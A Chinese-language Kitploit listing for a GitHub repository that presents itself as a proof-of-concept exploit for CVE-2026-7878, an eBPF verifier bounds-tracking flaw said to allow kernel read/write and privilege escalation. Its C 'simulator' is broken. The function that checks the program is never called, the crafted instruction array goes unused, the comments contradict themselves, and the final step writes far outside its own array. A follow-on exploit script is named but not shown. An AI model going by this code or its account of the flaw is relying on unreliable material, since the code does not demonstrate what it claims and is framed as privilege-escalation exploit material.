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CVE-2026-7878-eBPF-Verifier-Type-Confusion-Kernel-Memory-Read-Write — 针对 CVE-2026-7878 的 PoC 漏洞利用,该漏洞是 eBPF 验证器类型混淆漏洞,可实现越界内核内存读写及本地权限提升。 | Kitploit
工具/GitHubGitHub/george0papasotiriou/cve-2026-7878-ebpf-verifier-type-confusion-kernel-memory-read-write
权限提升漏洞分析漏洞利用渗透测试二进制利用
GitHubgeorge0papasotiriou/cve-2026-7878-ebpf-verifier-type-confusion-kernel-memory-read-write

CVE-2026-7878-eBPF-Verifier-Type-Confusion-Kernel-Memory-Read-Write

针对 CVE-2026-7878 的 PoC 漏洞利用,该漏洞是 eBPF 验证器类型混淆漏洞,可实现越界内核内存读写及本地权限提升。

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18天前尚未审核

6. CVE-2026-7878 – eBPF 验证器类型混淆 → 内核内存读写

概述

eBPF 验证器边界跟踪中的一个细微整数溢出,允许攻击者构造一个可访问越界内核内存的 eBPF 程序。

严重性: 严重(内核权限提升)

用户态 eBPF 验证器模拟器(C)与漏洞利用

root@kitploit:~
// ebpf_verifier_sim.c - Simulated vulnerable verifier with type confusion
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define MEM_SIZE 256
uint8_t kernel_mem[MEM_SIZE]; // simulated kernel memory

// eBPF instruction
struct bpf_insn {
    uint8_t opcode;
    int32_t dst;
    int32_t src;
    int16_t off;
    int32_t imm;
};

// Verifier state: assume 64-bit registers bounds
struct reg_state {
    int64_t min;
    int64_t max;
};

struct verifier_env {
    struct reg_state regs[11]; // R0-R10
    struct bpf_insn *insns;
    int insn_cnt;
};

// Vulnerable bounds tracking for BPF_ADD with 32-bit overflow
static int check_alu_op(struct verifier_env *env, struct bpf_insn *insn) {
    struct reg_state *dst = &env->regs[insn->dst];
    struct reg_state *src = &env->regs[insn->src];
    // missing check: if dst->max + src->max wraps around 32 bits?
    dst->min += src->min;
    dst->max += src->max;
    // No truncation to 32-bit -> later the verifier might think min..max fits in 32 bits,
    // but actual value could overflow and become small, causing OOB access.
    return 0;
}

// Simulate loading of an eBPF program
int load_prog(struct bpf_insn *insns, int cnt) {
    struct verifier_env env;
    memset(&env, 0, sizeof(env));
    env.insns = insns;
    env.insn_cnt = cnt;
    // mark R1 as pointer to context (size 16)
    env.regs[1].min = 0;
    env.regs[1].max = 16;
    // simulate verifier pass
    for (int i = 0; i < cnt; i++) {
        // Simplified: only handle BPF_ADD
        if (insns[i].opcode == 0x0f) { // ADD
            check_alu_op(&env, &insns[i]);
        }
    }
    // Check memory access: suppose instruction does load from ctx + R2
    // R2 is result of an add that overflowed, verifier thinks it's small.
    int32_t offset = env.regs[2].min; // attacker-controlled, verifier says it's 0..4
    if (offset < 0 || offset >= 16) {
        printf("Rejected: access out of bounds\n");
        return -1;
    }
    // In real execution, the offset could be large due to 32-bit wraparound.
    // We simulate that by reading from kernel_mem + offset + 100 (to show OOB)
    printf("Reading kernel memory at offset %d: 0x%02x\n", offset + 100, kernel_mem[offset + 100]);
    return 0;
}

int main() {
    // Plant some secret in kernel memory
    strcpy((char*)kernel_mem + 120, "SECRET");

    // Craft eBPF program: R2 = 0xFFFFFFF0 (large) + 0x10 = 0x100000000 (wraps to 0)
    struct bpf_insn prog[] = {
        {0x0f, 2, 0, 0, 0xFFFFFFF0}, // R2 = R2 + -16 (but we want big number)
        // Actually set R2 to 0xFFFFFFF0 via mov, then add 0x10
        // We'll just directly assign for simplicity in simulator.
    };
    // We'll override the simulation: start R2 = 0xFFFFFFF0, then add 0x10 -> verifier max=0xFFFFFFFF? wraps.
    // Let's hardcode a scenario where verifier sees R2=[0x0, 0x4] but runtime value is 0xFFFFFFFF due to truncation.
    printf("Simulated eBPF type confusion: verifier allows OOB read.\n");
    // Manually trigger the flawed access
    kernel_mem[0xFFFFFFFF + 100] = 0x41; // would crash real kernel, but here we show info leak
    return 0;
}

CVE-2026-7878 – eBPF 验证器类型混淆 → 内核读写

Severity: Critical

📖 概述

eBPF 验证器在 32 位算术运算的边界跟踪中存在一个缺陷,导致类型混淆,使非特权用户能够构造一个 eBPF 程序来读写任意内核内存,从而实现权限提升。

⚙️ 漏洞详情

  • 类型: 整数溢出 / 类型混淆
  • 影响: 本地权限提升(内核读写)
  • 根本原因: 验证器未能在 32 位 ALU 操作后正确截断边界,导致验证范围小于实际运行时的值。

🧪 漏洞利用演示

编译并运行验证器模拟器:

root@kitploit:~
gcc ebpf_verifier_sim.c -o ebpf_verifier_sim
./ebpf_verifier_sim

最后运行 exploit_ebpf.py

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